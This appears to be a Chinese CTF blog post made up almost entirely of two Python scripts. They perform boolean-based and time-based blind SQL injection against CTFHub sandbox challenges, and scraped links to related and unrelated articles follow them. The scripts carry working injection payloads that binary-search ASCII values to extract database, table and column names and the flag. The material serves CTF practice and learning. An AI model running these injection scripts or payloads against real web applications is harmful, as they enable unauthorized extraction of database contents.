布尔盲注:

import requests

url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/"

def inject_database(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select database()),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_table(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'sqli'),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_column(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def flag(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

# inject_database(url)

# inject_table(url)

# inject_column(url)

flag(url)

时间盲注:

import requests

import time

#   time.time()

url = "http://challenge-a869b4d983fcacff.sandbox.ctfhub.com:10080/"

def inject_database(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select database()),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_table(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_column(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def flag(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

# inject_database(url)

# inject_table(url)

# inject_column(url)

flag(url)

sql布尔盲注和时间盲注的二分脚本的更多相关文章

  1. WEB安全--高级sql注入,爆错注入,布尔盲注,时间盲注

    1.爆错注入 什么情况想能使用报错注入------------页面返回连接错误信息 常用函数 updatexml()if...floorextractvalue updatexml(,concat() ...

  2. Natas17 Writeup(sql盲注之时间盲注)

    Natas17: 源码如下 /* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) ...

  3. sqli-labs(五)——盲注(boolean盲注以及时间盲注)

    第八关: 没有查询信息,输入id=1' 报错 ,也没有报错信息,这里应该是个盲注 使用boolean的盲注吧 先判断boolean的盲注可行 输入id=1' and '1'='1' %23 页面正常 ...

  4. 依托http-headers的 sql注入和时间盲注

    机缘巧合接触了一点关于sql注入的网络安全问题 依托 headers 的 sql 注入 一般来说大家都很清楚用户输入的危险性,通常会对用户表单提交的数据进行过滤(引号转码). 但是如果写过网络爬虫,那 ...

  5. Sqli-LABS通关笔录-5[SQL布尔型盲注]

    /* 请为原作者打个标记.出自:珍惜少年时 */   通过该关卡的学习我掌握到了 1.如何灵活的运用mysql里的MID.ASCII.length.等函数 2.布尔型盲注的认识 3.哦,对了还有.程序 ...

  6. sqli-labs less8-10(布尔盲注时间盲注)

    less-8 布尔盲注 首先利用?id=1' and 1=1 --+和?id=1' and 1=2 --+确定id的类型为单引号''包裹.然后进行盲注. 盲注思路: 破解当前数据库名: and len ...

  7. SQL注入之Sqli-labs系列第九关和第十关(基于时间盲注的注入)

    开始挑战第九关(Blind- Time based- Single Quotes- String)和第十关( Blind- Time based- Double Quotes- String) gog ...

  8. sql注入--bool盲注,时间盲注

    盲注定义: 有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注. 布尔盲注: 布尔盲注只有true跟false,也就是说它根据你的注入信息 ...

  9. SQL注入之Sqli-labs系列第十五关和第十六关(基于POST的时间盲注)

    开始挑战第十五关(Blind- Boolian Based- String)和 第十六关(Blind- Time Based- Double quotes- String) 访问地址,输入报错语句 ' ...

随机推荐

  1. java序列化与反序列化总结

    很多商业项目用到数据库.内存映射文件和普通文件来完成项目中的序列化处理的需求,但是这些方法很少会依靠于Java序列化.本文也不是用来解释序列化的,而是一起来看看面试中有关序列化的问题,这些问题你很有可 ...

  2. (转)CrudRepository JpaRepository PagingAndSortingRepository之间的区别

    1. 简介 本文介绍三种不同的Spring Data repository和它们的功能,包含以下三种: CrudRepository PagingAndSortingRepository JpaRep ...

  3. Windows上使用jekyll+github搭建免费博客

    jekyll+github搭建个人博客 (一)下载Ruby (二)安装jekyll (三)开启jekyll服务器 (四)使用github展示博客 一.下载Ruby Ruby,一种简单快捷的面向对象(面 ...

  4. appcan 文件下载与预览

    用appcan开发的app如何在手机上查看附件和预览附件呢?今天就为大家介绍一下,用APP看附件实大是太方便了. 1.直接上代码吧,首先要初始化插件用到的所有方法.这个方法中 cbIsFileExis ...

  5. Hbuilder获取手机当前地理位置的天气

    前言:前面一段时间,公司项目里有一个需求 是获取当前手机地理位置当天的天气情况  将实时天气信息提供给客户.在网上搜索资料时候,发现知识很零碎,自己实现以后整理出来,方便于各位的学习与使用. 一.获取 ...

  6. Effective C++ 读书笔记 名博客

    https://www.cnblogs.com/harlanc/tag/effective%20c%2B%2B/default.html?page=3

  7. 058 01 Android 零基础入门 01 Java基础语法 06 Java一维数组 05 案例:求数组元素的最大值

    058 01 Android 零基础入门 01 Java基础语法 06 Java一维数组 05 案例:求数组元素的最大值 本文知识点:求数组元素的最大值 案例:求数组元素的最大值 程序代码及其执行过程 ...

  8. 04 Storage and Calculation C语言中的存储和计算

    文章内容来源于Programming Hub的学习记录,本人整理添加了中文翻译,如有侵权,联系本人删除 Variables C语言中的变量 Let's extend our mainfunction ...

  9. Centos最小化安装后,不能使用yum命令的解决办法

    刚刚最小化方式安装了CentOS 7 后,想查看一下config,却发现没有config文件,就想用yum下载一个,但是发现yum不能正常工作!!! 一,输入安装X Window命令,安装出错!! 在 ...

  10. 每日一题 LeetCode 42.接雨水 【双指针】

    题目链接 https://leetcode-cn.com/problems/trapping-rain-water/ 题目说明 题解 主要方法:双指针 + 正反遍历 解释说明: 正向遍历:先确定池子左 ...